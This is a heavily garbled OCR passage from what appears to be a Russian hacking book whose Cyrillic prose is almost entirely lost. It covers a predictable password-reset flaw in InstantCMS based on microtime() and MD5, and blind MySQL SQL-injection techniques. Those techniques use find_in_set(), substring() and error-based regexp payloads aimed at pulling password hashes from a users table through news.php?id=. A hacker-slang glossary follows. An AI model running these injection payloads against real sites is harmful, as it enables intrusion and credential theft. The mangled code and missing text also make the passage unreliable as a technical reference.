h ttp s://forum.antichat.ru/showpost.php?p-2138088&postcount-23
, ,
http://ifolder.ru/17669676
http://webfile.ru/4490132
.
( )
.
? /com ponents/registration/frontend.php :
$sql "SELECT * FROM cms_users WHERE email - 'SemaiT LIMIT 1";
Sresult = $inDB->query($sql) ;
i f ($inDB->num_rows(Sresult)>0){
$usr = $inDB->fetch_assoc($result):
Snewpassword = substr(md5(microtimeO), 0, 6);
$inDB->query("UPDATE cms_users SET password '" .md5($newpassword)."' WHERE id - ".$usr[1d']) ;
$mail_message I $_LANG[ ' HELLO' ] . ' , ' . $usr['nickname'] . ! '. "\n\n";
$mail_message = $_LANG['HELLO' ] . ' , ' . $usr['nickname'] . ' ! ' . "\n\n";
$mail_message .= $_LANG[
'REMINDERJEXT'].'
,$inC onf-> sitenam e. . "\n\n":
$mail_message
$_LANG[*0UR_PASS_IS_MD5'3 . "\n";
$mail_message
$_LAN6['0UR_PASS_IS_MD5_TEXT'] . "\n\n";
$mail_message .= ' ########## ' .$_LANG['Y0UR_L0GIN'].': ' ,$usr[
'lo g in '].
''
$mail_message
1 '. $_LANG[
' Y0UR_NEW_PASS' ] . : ' .$newpassword . "\n\n":
instantCMS
159
$mail_message .- $_LANG['YOU_CAN_CHANGE_PASS']."\n";
Smail_message
$_LANG['IN_CONFIG_PROFILE'].':
cmsUser::
getProfileURL(Susr['login']) . "\n\n;
$mail_message
$_LANG[
'SIGNATURE'].. '. $inConf->sitename . ' ('.HOST.').' . "\n";
$mail_message .- date('d-m-Y (H:i)');
$inCore->mailText(Sernail, SinConf->sitename.' -
.$_LANG[
*REMINDER_PASS]. $mail_message);
.
?
1. , .
2. , ,
, microti me().
microti me .
,
gett i meofday ().
msec sec, sec ,
Unix (The Unix Epoch, 1 1970, 00:00:00 GMT),
a msec . - :
. [1273589840]
,
, Unix.
?
, .
- :
. 11 May 2010 20:39:23 GMT
, 1970, 00:00:00
GMT.
Vv i
, .
OjacaxcOO ( , Unix
). :
0.30001200 1273589840
( ).
substr(md5(3Wd4eHne), 0, 6)
md5-xeni
, :
1512
160
8.
1 . .
| -.
. ,
11 : 1000000/11 90.909
. , ,
.
,
100-,
. ,
.
SQL-
() ,
SQL-.
, ,
(, md5 ). ,
, .
, ,
,
/etc/passwd. , . ,
( )
, ,
.
, ,
.
, ,
, , .
/etc/passwd
. , ,
(, ,
/etc/passwd ,
, ).
, ,
SQL-,
.
find_in_set(substr, strlist)
MySQL find_in_set(),
, .
, . ,
162
9. SQL-
0.
MySQL ( ' ' 'a.b.c.d.e'):
mysql> SELECT FIND_IN_SET(''.'a.b.c.d.e');
-> 3
15- :
,2,3.4.5.6,7.8,9.a.b.c.d.e,
:
select find_in_set((substring((select password from users
limit D.l.l)).'0.1.2.3.4.5.6.7.8.9.a.b.c.d,e.f');
, ' 11. ,
1 16,
:
news.php?i d=fi nd_i n set (substri ng( (sel ect password from users
limit 0.1).l.l).'0.1.2.3.4.5.6.7.8.9.a.b.c.d.e.f')
,
.
.
1.
( , ).
2. find_in_set()
.
3. ,
, .
: 32+16 15-.
find_in_set() : INSTRO,
LOCATE(), ASCI I(), 0RD(), ASCI I() ORDO ,
MySQL.
.
:
;
,
.
:
,
;
,
, .
find_jn_set() + morelrow
163
find_in_set() + m orelrow
,
(, ).
Elekt.
, SQL-.
( podkashey)
SELECT 1 UNION SELECT 2
Subquery returns more than 1 row
ZaCo :
"" regexp concat("{1,25". if(@@version<>5 , }, 6}"))
/*
else
*/
MySql, 5,
#1139 I Got error 'invalid repetition count(s)' from regexp.
9 ,
regexp, 11
, .
SELECT 1 .
:
select i f (1-1.(select 1 union select 2).2)
^
#1242 - Subquery returns more than 1 row
select 1 regexp if(l=l,"x{l,0}".2)
#1139 - Got error invalid repetition count(s) from regexp
select 1 regexp if(l-l," x { l.(" .2 )
#1139 - Got error ' braces not balanced from regexp
select 1 regexp i f (1=1,[ [ : ] ] .2)
#1139 - Got error 'invalid character class from regexp
select 1 regexp i f ( 1 = 1 , , 2 )
#1139 - Got error brackets ([ ]) not balanced from regexp
select 1 regexp i f (1-1,(({1} .2)
#1139 - Got error 'repetition-operator operand invalid' from regexp
select 1 regexp i f ( l - l , " , 2 )
#1139 - Got error 'empty (subExpression from regexp
select 1 regexp i f (1-1,( ,2)
#1139 - Got error 'parentheses not balanced from regexp
select 1 regexp i f (1-1.[2-1] ,2)
#1139 - Got error invalid character range from regexp
select 1 regexp i f (1-1,[[.c h .] ] .2)
#1139 - Got error invalid collating element from regexp
select 1 regexp i f (1-1, '\V ,2)
#1139 - Got error 'tra ilin g backslash (\) from regexp
164
9. SQL-
f1nd_in_set().
, , , 0.
:
select * from users where ich-1 AND "x" regexp concat(
"x{l,25". if(find_in_set(substring((select passwd from users
where id = l).l.l).Ta Ib .c .d ,e .f.l.2 .3 .4 .5 .6 , )>0. (
select 1 union select 2). 6}"))
'...d..f . 1,2.3 . 4 . 5 . 6',
:
#1242 - Subquery returns more than 1 row
#1139 - Got error 'invalid repetition count(s)' from regexp
To ,
. ,
.
15- ,
[0-9, -f]. ,
12 (11 , ). , :
[1] '0'
[2] *1'
[3] '2'
[4] '3'
[5] '4'
[6] '5'
[7] '6'
[8] '7'
[9] '8'
[10]: '9
]:
, ,
, .
2- 11-,
. 1,
-
:
[1] '0
[2] *
[3] '
[4] 'd
[5] '
[6] f
SQL .
flndjn_set() + morelrow
165
1. .
2. ,
.
3. , ,
, ,
1.
, , ,
[a-z, A-Z, 0-9] 11
.
,
,
,
.
, 42 md5-x3m.
:
;
.
, ,
.
.
,
. 11 ,
,
. I!
, (,
, ).
-day
.
0-
. -.
jtr . .
(abend, aborption end) ,
(abort) () ,
^ (abuse)
,
,
.
(admin) ,
. .
(account) , ,
. .
(, ) ICQ (--), .
, (black hat) , ,
^
167
<V
|'(\1|(! Windows.
. (vilt*)
llydl'tt,
'l'IUw4
hht, Wh hat.)
, .
,
, , .
( I ) ! Service, I >*S)
' |(11
Miiiiih Juvtt (
;.1JavaScript.
h;i D oS-.
* ( )
;>,
(inject)
, . .
(include)
(inclutliiiK)
. (include)
<, ,
,
(inject ion)
* ,
) , * ,
(I )
||||<
, .
.
() (keyboard)
' (1)
'
168
10.
(code) , -
.
(coding) .
.
(core) .
netcat.
(crack) , -
.
(cool hacker) (
).
(lamer) , ;
, .
(.) Linux.
(log) (
).
(log-wiper) , (. ).
(login) .
.
( must die) - , ; MS Windows.
(malware) .
. .
(manual) ( -,
).
(must have) - ,
.
, ,
(mIRC) ,
.
MySQL.
(mail) , e-mail.
.
.
netcat ().
(nick, nickname) .
Unix- .
;>; ^
( null)
, , 6; * ,
- (mdl-byle, by to)
(nuke)
, .
. .
169
(<)S)
( public nplo.it) , ,
I , -day sploit.
(pass, password)
,
Python Python.
( )S/2 (|> I (
).
( to root)
,
( use)
( use)
, .
, -.
P IIP .
(root)
*nix .
root.
SunOS.
, (secure)
. .
<', .
(script kiddie)
-,
, , ,.
.
. .
SQL.
170
10.
, (sniffer)
cookie).
, - (,
, - Solaris,
(soft) , ,
,
.
, (sploit) .
.
. .
ICQ (. ).
(tips) , .
(tricks) ( ).
. .
.
., . .
Linux ( ),
(user identification number, UIN) ICQ.
, .
(Frequently Asked Questions, FAQ)
.
(phishing)
.
, (flood) ,
FreeBSD,
. .
(hack) .
& (hacking) ,
-.
.
. .
(host) , , ,
,
,
. .
171
- (Internet worm), .
(shell) .
IC O ,
.
(exploit) ,
.
( use) , . , . .
. .
(user) .
. .